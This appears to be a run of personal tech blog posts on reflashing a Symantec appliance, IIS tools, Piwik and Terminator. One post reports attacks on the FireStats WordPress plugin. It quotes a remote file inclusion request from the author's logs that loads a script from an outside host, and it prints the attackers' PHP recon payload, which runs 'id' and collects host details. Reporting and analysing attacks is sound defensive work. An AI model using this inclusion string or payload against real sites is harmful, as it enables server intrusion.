Way back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec 5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.
As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2Ghz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB and one RS-232 ports. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter s out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.
So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSD’s or Linux from experience with Nokia Checkpoint which ran NetBSD I think.
Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.
Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.
Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.
Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.
Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!
The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download
Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.
Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.
At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.
A sample from my logs looks like this:
http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??
The scripts themselves seem to have two versions. The most common one like above has the following contents:
<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>
The other one contains the following:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }
echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;
All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
Microsoft have played a bit of a blinder. I’ve always found it a nightmare to set up ASP.net applications on IIS. Even getting PHP up and running and playing nice on IIS can be an absolute nightmare at times. No more however. If you are running IIS 6 or 7 then it is well worth your while installing Microsoft’s Web Platform Installer.
At the moment I’m using version 2 which is in beta but it is fine for production use albeit with one very unusual and weird quirk. If you try to install a package it will throw a wobbly if you are not in the Pacific, US and Canada time zone. So change the time zone before installing a web app and don’t forget to change it back once you are finished.
Rather than wax on about it myself I will just rehash Microsoft’s blurb:
The Microsoft Web Platform Installer 2.0 (Web PI) is a free tool that makes it simple to download, install and keep up-to-date with the latest components of the Microsoft Web Platform, including Internet Information Services (IIS), SQL Server Express, .NET Framework and Visual Web Developer. In addition, install popular open source ASP.NET and PHP web apps with the Web PI.
If you have to administer or are setting up an IIS server then it’s an essential install!
I have somewhat of an obsession of poring over my logfiles. Whichever PC or laptop I happen to be using at home will always have an ssh session open in the background with a tail of my reverse proxies logs whizzing by. But when it comes to running reports there are plenty of options. Most of which I have used and two days ago I discarded them all for new alternative.
Up until recently I was using both Google Analytics and Woopra. They both pretty much report the same information with just a different look. One issue I noticed with both was performance. Occasionally a page would stall or load slowly while the client connected to one of my sites was waiting to load the script from either Google or Woopra. And as everybody could testify, waiting for a page to load – even if it is just for a couple of seconds – can be frustrating.
In addition to Google Analytics and Woopra I also used AWstats to parse the log file. However that would be fine for one site but when running multiple sites it can become a bit of a pain as each site has its own report. Ideally what I was looking for was something more realtime like Google Google Analytics and Woopra. And what I found was Piwik!
Although it is in early beta it was a doddle to setup. I created a new domain and set it up to accept stats from each of my own sites. Each site gets its own dashboard. Once you setup a site you get a little bit of code to insert somewhere on your pages.
For my WordPress powered sites I did this by simply inseting the script into the themes footer.php and for my primary site powered by MediaWiki it was a similar process. Although once I have everything set up I noticed that there is a WordPress plugin available.
I already mentioned it is in beta so there are a few quirks but overall it is a nice piece of software and is running rather well for me.
Screenshot from Piwik homepage.
I tend to have multiple ssh sessions open at once to my multiple *nix machines. However despite all the best attempts to keep some order all the windows tend to clutter up the desktop. Gnome terminal goes some way to easing that pain by supporting tabs but it would be even nicer if I could have multiple consoles all in a single window.
After a bit of digging I came across Gnome Terminator.
It’s a rather nice simple terminal console app but where it wins for me is that if you right click inside the terminal you can split the terminal horizontally or vertically or any combination of both. If you see my screenshot below it will give you a good idea. And yes almost all my machines are names after characters in Stargate!
Chances are that there are already pre-built binaries available for your distribution. At least there is for my Ubuntu workstation so it was a simple
sudo apt-get install terminator
It’s certainly worth checking out if like me you like to have lots of console windows open.
Terminator in action
